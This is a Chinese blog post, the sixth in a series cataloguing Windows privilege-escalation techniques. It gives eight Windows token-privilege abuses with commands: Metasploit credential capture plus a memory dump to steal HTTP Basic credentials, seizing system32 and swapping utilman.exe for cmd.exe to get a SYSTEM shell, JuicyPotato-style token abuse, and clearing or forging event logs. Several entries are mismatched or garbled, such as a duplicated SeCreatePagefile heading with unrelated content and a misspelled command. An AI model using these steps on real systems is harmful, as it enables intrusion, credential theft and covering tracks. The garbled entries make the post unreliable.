百种提权及手段一览系列第6集

最新推荐文章于 2024-08-20 20:55:28 发布
最新推荐文章于 2024-08-20 20:55:28 发布
阅读量508 收藏 18
点赞数 5
文章标签: 网络安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35254085/article/details/138226751
版权

特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
在这里插入图片描述

主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。

截至目前,我们一共分享了39种提权方法,本期我们继续整理了8种热门提权方式,本期分享完后,我们一共分享了47种方法离100种方法也快完在一半了,继续查收哟,:
1.Abuse via SeBackup
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
In Metasploit (msf > prompt) 输入: use auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) 输入: set uripath x
In Metasploit (msf > prompt) 输入: run
在taskmgr中,右键单击“Image Name”栏中的“iexplore.exe”
并从弹出菜单中选择“创建转储文件”.
strings /root/Desktop/iexplore.DMP | grep “Authorization: Basic”
选择复制 Base64 编码字符串
在命令提示符下键入:echo -ne [Base64 String] | Base64-d
2.Abusing via SeCreatePagefile
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin
批注:https://github.com/MagnetForensics/Hibr2Bin

3.Abusing via SeSystemEnvironment
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
TrustExec.exe -m exec -c “whoami /priv” -f
批注:两个工具都没找到QAQ

4.Abusing via SeTakeOwnership
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
takeown.exe /f “%windir%\system32”
icalcs.exe “%windir%\system32” /grant “%username%”:F
将cmd.exe重命名为utilman.exe
锁定控制台并按Win+U

5.Abusing via SeTcb
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
PSBits
Or
PrivFu
psexec.exe -i -s -d cmd.exe

6.Abusing via SeTrustedCredManAccess
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
Or
CredManBOF
TrustExec.exe -m exec -c “whoami /priv” -f

7.Abusing tokens via SeAssignPrimaryToken
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
JuicyPotato.exe
Or
https://github.com/decoder-it/juicy_2
https://github.com/antonioCoco/RoguePotato

8.Abusing via SeCreatePagefile
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
invoke-module LogCleaner.ps1
批注:wela链接https://github.com/Yamato-Security/WELA
日志伪造工具flog:https://github.com/mingrammer/flog

汇智知了堂
关注
  • 5
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
百种提权手段一览系列第4
qq_35254085的博客
04-25 3162
Rubeus.exe asktgt /user:“目标_sam名称” /certificate:cert.pfx /password:“CERTIFICATE_PASSWORD” /domain:“FQDN_域名” /dc:“域名_CONTROLLER” /show。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。无py版本,exe版本:https://github.com/ianxtianxt/MS14-068。类型: Injection。类型: Injection。
百种提权手段一览系列第3
qq_35254085的博客
04-25 3254
在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。类型: Abusing File Permission。类型: Abusing File Permission。类型: Abusing File Permission。类型: Abuse Privilege。类型: Abuse Privilege。类型: Abuse Privilege。类型: Abuse Privilege。
百种提权手段一览系列第8
qq_35254085的博客
04-26 754
特权升级的危险是显而易见的。批注:https://github.com/djhohnstein/SharpWeb/releases/tag/v1.2。批注:https://github.com/vivami/SauronEye/releases/tag/v0.0.9。类型: Enumeration & Hunt。类型: Enumeration & Hunt。类型: Enumeration & Hunt。类型: Enumeration & Hunt。类型: Enumeration & Hunt。
百种提权手段一览系列第9
qq_35254085的博客
04-26 805
批注:https://github.com/FSecureLABS/SharpClipHistory/releases/tag/v1.0。批注:https://github.com/bitsadmin/fakelogonscreen/releases/tag/1.1。批注:https://github.com/antonioCoco/RogueWinRM/releases/tag/1.1。批注:https://github.com/hoangprod/AndrewSpecial。
百种提权手段一览系列第7
qq_35254085的博客
04-26 845
特权升级的危险是显而易见的。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。In Metasploit (msf > prompt) 输入: set payload windows/meterpreter/reverse_tcp。In Metasploit (msf > prompt) 输入: use auxiliary/server/capture/http_basic。
百种提权手段一览系列第2
qq_35254085的博客
04-25 889
ntlmrelayx.py只找到个很相似的:https://github.com/LuemmelSec/ntlmrelayx.py_to_exe。release版本:https://github.com/jajp777/sysret/tree/master/x64/Release。批注:https://github.com/Kevin-Robertson/Tater。批注:https://github.com/berdav/CVE-2021-4034。类型: 0/1 Exploit。
百种提权手段一览系列第10
qq_35254085的博客
04-26 607
主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。类型: Enumeration & Hunting。类型: Enumeration & Hunting。类型: Enumeration & Hunting。类型:Enumeration & Hunting。类型:Enumeration & Hunting。类型:Enumeration & Hunt。
百种提权手段一览系列第11
qq_35254085的博客
04-26 266
主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。创建 C:\temp 文件夹并将 impersonate.bin 复制到 C:\temp。类型: 0/1 Exploit。类型: 0/1 Exploit。类型: 0/1 Exploit。类型: 0/1 Exploit。类型: 0/1 Exploit。操作系统:Windows。操作系统:Windows。
百种提权手段一览系列第5
qq_35254085的博客
04-25 790
主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。找了一圈,只有这儿有相关内容:https://github.com/gtworek/Priv2Admin。批注:sharpup链接https://github.com/GhostPack/SharpUp。批注:https://github.com/xct/SeManageVolumeAbuse。批注:https://github.com/boku7/injectEtwBypass。
光洋系列产品电缆使用一览
03-19
光洋系列产品电缆使用一览主要涉及编程电缆、编程器电缆、PLC与显示器连接、计算机与显示器连接等部分的详细介绍和参数说明。 一、编程电缆PLC-计算机RS-232C 1. 6P水晶电话头――9P孔型适用型号:SE-22、SH...
面向新手系列《四》官方文档BUG,tip及QA提示一览
03-29
特别说明:本bug及tip仅适用于0.10.112301及之前的版本,之后更新的版本请优先对比官方文档; 注册程序: 注意: App() 必须在 app.js 中注册,且不能注册多个。 不要在定义于 App() 内的函数中调用 getApp() ,使用...
DZB100系列变频器额定参数一览
03-20
但是,我可以根据“DZB100系列变频器额定参数一览表”的标题和描述,以及一般变频器的知识,为您详细说明变频器额定参数的知识点。 变频器是一种电源转换装置,其主要作用是将固定频率的交流电转换为可变频率的交流...
物联网培训之基础行业及技术一览.pptx
11-23
物联网培训之基础行业及技术一览.pptx
三菱PLC错误代码一览及对策.doc
11-30
三菱PLC错误代码一览及对策是该PLC系列的错误代码大全,涵盖了常见的错误代码、错误讯息、异常内容、原因和对策。 错误代码(D8061):0000 错误讯息:NO ERROR 异常内容:无异常错误发生 对策:请检查主机与I/O...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8412
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
叉车ai行人防撞预警系统,前后盲区防撞报警,让行车更安全
jiuxindianzi的博客
08-20 513
九盾叉车AI防撞预警系统,含九配件,三颗摄像头监测盲区与疲劳,可选车速等配件增强安全监测。特点包括实时监测、动态规划、高精度定位、多级防撞等,全方位保障叉车操作安全
OV SSL证书:增强网站信任与安全的重要保障
alsknv的博客
08-20 1298
OV SSL证书,全称为Organization Validation SSL证书,是一种需要通过验证网站或组织真实身份才能颁发的SSL证书。它不仅能为网站提供数据传输的加密功能,还能向用户展示网站的真实身份,增强用户的信任感。OV证书适用于所有需要在线信任和安全的网站,特别是电子商务网站、在线银行、金融机构以及企业门户网站等。OV SSL证书_企业验证级SSL证书-JoySSLOV是英文单词Organization Validation的缩写,即单位组织信息验证。
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
最新发布
一点硬件
08-20 322
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值